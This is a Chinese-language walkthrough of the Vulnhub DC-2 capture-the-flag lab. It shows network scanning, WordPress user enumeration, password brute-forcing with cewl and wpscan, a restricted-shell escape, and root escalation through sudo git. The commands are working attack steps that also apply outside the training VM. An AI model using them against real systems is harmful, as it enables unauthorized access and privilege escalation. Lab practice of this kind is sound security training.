Vulnhub DC-2

下载地址：https://www.vulnhub.com/entry/dc-2,311/

NAT连接，确保kali和虚拟机在同一网段

kali：192.168.152.130

扫描存活主机

arp-scan -l
masscan -p 80,22 192.168.152.0/24
nmap -sP 192.168.152.0/24

得到目标机IP：192.168.152.246

扫描开放端口

nmap -sS -sV -v -p- -A 192.168.152.246

得到目标机开放端口：80、7744（SSH）

扫描目录

访问80端口看下网站信息

得到信息：

CMS---------->WorldPress4.7.10

脚本---------->PHP

操作系统--->Linux

数据库------->Mysql

有个小提示：访问会跳转dc-2，需要去hosts里绑定一下

vim /etc/hosts
192.168.152.246 dc-2

浏览网页获得第一个flag

根据提示是需要爆破，使用cwel工具生成密码字典

当能知道是什么CMS后，就可以针对性的搜索漏洞或者利用工具

使用wpscan扫描网站

先用cewl生成密码词典

cwel：Linux下的密码生成工具，爬取网页的，可以指定深度

学习文章：https://www.codercto.com/a/44828.html

cewl http://dc-2/ -w passwd.txt

使用wpscan扫描

wpscan --url http://dc-2 -e u

爆出admin、jerry、tom账户，再根据passwd.txt爆破密码

有了账号密码，可以去尝试登录后台和ssh

可以看到jerry权限不够，tom可以成功登录

ssh [email protected] -p 7744

登录ssh后拿到flag3

cat命令没有，可以用vi

其实还可以使用如下命令查看当前有哪些命令可以使用

compgen -c

这边说要su -jerry

尝试下不行

这里需要绕过受限制的shell

受限制的shell：顾名思义就是被限制了使用，它与一般标准shell的区别在于会限制执行一些行为。

绕过方法：

BASH_CMDS[a]=/bin/sh;a 
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin</pre>

登录jerry，拿到flag4

最后根据提示git提权

git -p 分页显示命令手册，会调用more命令，more命令是可以执行sh的

https://gtfobins.github.io/gtfobins/git/

sudo /usr/bin/git -p help config
!/bin/sh

原文始发于微信公众号（Nurburgring）：​Vulnhub DC-2